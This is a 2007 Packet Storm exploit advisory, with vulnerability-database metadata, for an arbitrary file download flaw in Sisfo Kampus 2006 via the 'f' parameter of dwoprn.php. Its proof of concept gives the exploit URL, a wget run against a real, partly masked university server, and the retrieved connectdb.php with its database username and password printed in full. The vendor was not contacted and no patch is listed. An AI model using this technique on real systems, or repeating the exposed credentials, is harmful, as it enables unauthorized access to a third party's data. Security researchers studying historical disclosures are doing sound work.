Search...

PUPET-SisfoKampus2006.txt

2007-09-10T00:00:00

ID PACKETSTORM:59208
Type packetstorm
Reporter k-one
Modified 2007-09-10T00:00:00

Description

                                        
                                            `original File name : PUPET-SisfoKampus2006.txt  
  
date releases : September 10, 2007  
  
  
  
Information :  
  
=========================  
  
Advisory Name: Sisfo Kampus 2006 Local File Downloaded Vulnerability  
  
Author: k-one A.K.A PUPET  
  
Website vendor : http://sisfokampus.net/  
  
Problem : All Local File can downloaded  
  
  
POC :  
  
=========================  
  
  
  
http://[h0sT]/[dir]/dwoprn.php?f=connectdb.php  
  
  
  
  
  
[pupet@vps ~]$ wget http://***.*****-subang.ac.id/dwoprn.php?f=connectdb.php  
  
--07:30:16-- http://***.*****-subang.ac.id/dwoprn.php?f=connectdb.php  
  
=&gt; `dwoprn.php?f=connectdb.php'  
  
Resolving ***.*****-subang.ac.id... 203.130.***.**  
  
Connecting to siak.universitas-subang.ac.id[203.130.***.**]:80... connected.  
  
HTTP request sent, awaiting response... 200 OK  
  
Length: 292 [application/dwoprn]  
  
  
  
100%[====================================================================================================================================================================&gt;] 292 --.--K/s  
  
  
  
07:30:22 (2.78 MB/s) - `dwoprn.php?f=connectdb.php' saved [292/292]  
  
  
  
[pupet@vps ~]$ cat dwoprn.php?f=connectdb.php  
  
&lt;?php  
  
// file: connectdb.php  
  
// author: E. Setio Dewo, Maret 2003  
  
  
  
$db_username = "t26924_siak";  
  
$db_hostname = "localhost";  
  
$db_password = "siakang";  
  
$db_name = "t26924_siak";  
  
  
  
$con = _connect($db_hostname, $db_username, $db_password);  
  
$db = _select_db($db_name, $con);  
  
  
  
?&gt;  
  
Vendor Response:  
  
==============  
  
Not contacted yet  
  
  
  
Patch :  
  
=============  
  
No Patch Available  
  
This bugs Discover by : k-one A.K.A PUPET (Join our community at irc.indoirc.net #safana)  
  
  
`

JSON Vulners Source

Initial Source

{"sourceHref": "https://packetstormsecurity.com/files/download/59208/PUPET-SisfoKampus2006.txt", "sourceData": "`original File name : PUPET-SisfoKampus2006.txt \n \ndate releases : September 10, 2007 \n \n \n \nInformation : \n \n========================= \n \nAdvisory Name: Sisfo Kampus 2006 Local File Downloaded Vulnerability \n \nAuthor: k-one A.K.A PUPET \n \nWebsite vendor : http://sisfokampus.net/ \n \nProblem : All Local File can downloaded \n \n \nPOC : \n \n========================= \n \n \n \nhttp://[h0sT]/[dir]/dwoprn.php?f=connectdb.php \n \n \n \n \n \n[pupet@vps ~]$ wget http://***.*****-subang.ac.id/dwoprn.php?f=connectdb.php \n \n--07:30:16-- http://***.*****-subang.ac.id/dwoprn.php?f=connectdb.php \n \n=> `dwoprn.php?f=connectdb.php' \n \nResolving ***.*****-subang.ac.id... 203.130.***.** \n \nConnecting to siak.universitas-subang.ac.id[203.130.***.**]:80... connected. \n \nHTTP request sent, awaiting response... 200 OK \n \nLength: 292 [application/dwoprn] \n \n \n \n100%[====================================================================================================================================================================>] 292 --.--K/s \n \n \n \n07:30:22 (2.78 MB/s) - `dwoprn.php?f=connectdb.php' saved [292/292] \n \n \n \n[pupet@vps ~]$ cat dwoprn.php?f=connectdb.php \n \n<?php \n \n// file: connectdb.php \n \n// author: E. Setio Dewo, Maret 2003 \n \n \n \n$db_username = \"t26924_siak\"; \n \n$db_hostname = \"localhost\"; \n \n$db_password = \"siakang\"; \n \n$db_name = \"t26924_siak\"; \n \n \n \n$con = _connect($db_hostname, $db_username, $db_password); \n \n$db = _select_db($db_name, $con); \n \n \n \n?> \n \nVendor Response: \n \n============== \n \nNot contacted yet \n \n \n \nPatch : \n \n============= \n \nNo Patch Available \n \nThis bugs Discover by : k-one A.K.A PUPET (Join our community at irc.indoirc.net #safana) \n \n \n`\n", "edition": 1, "references": [], "modified": "2007-09-10T00:00:00", "hash": "58f72a900e0539e985d7bff385d3b6100e38be4a35f27a438a05ddedf3d6a1b8", "cvelist": [], "history": [], "bulletinFamily": "exploit", "href": "https://packetstormsecurity.com/files/59208/PUPET-SisfoKampus2006.txt.html", "description": "", "id": "PACKETSTORM:59208", "reporter": "k-one", "lastseen": "2016-11-03T10:19:09", "published": "2007-09-10T00:00:00", "enchantments": {"score": {"value": 2.1, "vector": "NONE"}, "vulnersScore": 2.1}, "objectVersion": "1.2", "type": "packetstorm", "cvss": {"vector": "NONE", "score": 0.0}, "title": "PUPET-SisfoKampus2006.txt", "viewCount": 0, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "d4be9c4fc84262b4f39f89565918568f", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "description"}, {"hash": "283c864e9658e002d8b5924ba642fc55", "key": "href"}, {"hash": "17e0dd5365bc2b22db88536fee055aca", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "17e0dd5365bc2b22db88536fee055aca", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "6741465d15c14b5d17480336ac16bc20", "key": "reporter"}, {"hash": "af6f8bb6d6534d0d805e2a0d5b08135e", "key": "sourceData"}, {"hash": "e7a97af1fcae91acf68a952177f8c333", "key": "sourceHref"}, {"hash": "23653f6f134c475e3d40c85a5581c5ec", "key": "title"}, {"hash": "6466ca3735f647eeaed965d9e71bd35d", "key": "type"}]}